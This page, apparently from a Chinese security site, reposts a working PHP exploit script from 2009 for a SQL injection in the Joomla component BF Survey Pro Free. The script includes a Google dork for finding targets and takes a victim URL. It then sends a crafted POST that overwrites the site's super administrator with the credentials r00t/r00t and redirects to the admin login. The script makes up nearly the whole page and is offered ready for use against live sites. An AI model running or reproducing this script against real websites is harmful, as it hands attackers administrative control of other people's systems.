首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component BF Survey Pro Free SQL Injection Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-09-10  
<?php
 echo '<h2>Joomla Component BF Survey Pro Free SQL Injection Exploit</h2>';
 echo '<h4>jdc 2009</h4>';
 echo '<p>Google dork: inurl:com_bfsurvey_profree</p>';
   ini_set( "memory_limit", "128M" );
   ini_set( "max_execution_time", 0 );
   set_time_limit( 0 );
   if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
   $vulnerableFile = "http://".$_GET['url']."/index.php";
   $url = $vulnerableFile;
 $data = array();
 $data['option'] = 'com_bfsurvey_profree';
 $data['task'] = 'updateOnePage';
 $data['table'] = "jos_users set username=CHAR(".sqlChar( 'r00t' )."), password=CHAR(".sqlChar( md5('r00t' ) )."), email=CHAR(".sqlChar( 'x' ).") where gid=25 limit 1   --   '";
 $output = getData();
 die( '<script>alert("Now log in as r00t/r00t!");location.href="http://'.$_GET['url'].'/administrator/index.php";</script>' );
 function shutUp( $buffer ) { return false; }
 function sqlChar( $str ) { return implode( ',', array_map( 'ord', str_split( $str ) ) ); }
 function getData()
 {
   global $data, $url;
   ob_start( "shutUp" );
   $ch = curl_init();
   curl_setopt( $ch, CURL_TIMEOUT, 120 );
   curl_setopt( $ch, CURL_RETURNTRANSFER, 0 );
   curl_setopt( $ch, CURLOPT_URL, $url );
   if( count( $data ) > 0 )
   {
           curl_setopt( $ch, CURLOPT_POST, count( $data ) );
           curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) );
   }
   curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" );
   curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
   $result = curl_exec( $ch );
   curl_close( $ch );
   $return = ob_get_contents();
   ob_end_clean();
   return $return;
 }
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Novell eDirectory 8.8 SP5 Remo
·Joomla Component TPDugg 1.1 Bl
·SIDVault 2.0e Windows Universa
·Agoko CMS <= 0.4 Remote Comman
·HTMLDOC 1.8.27 (html File Hand
·Audio Lib Player (m3u File) Bu
·Windows Vista/7 SMB2.0 Negotia
·FTPShell Client 4.1 RC2 Remote
·SMB SRV2.SYS Denial of Service
·Pidgin MSN <= 2.5.8 Remote Cod
·GemStone/S 6.3.1 "stoned" Loca
·Millenium MP3 Studio (pls/mpf/
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved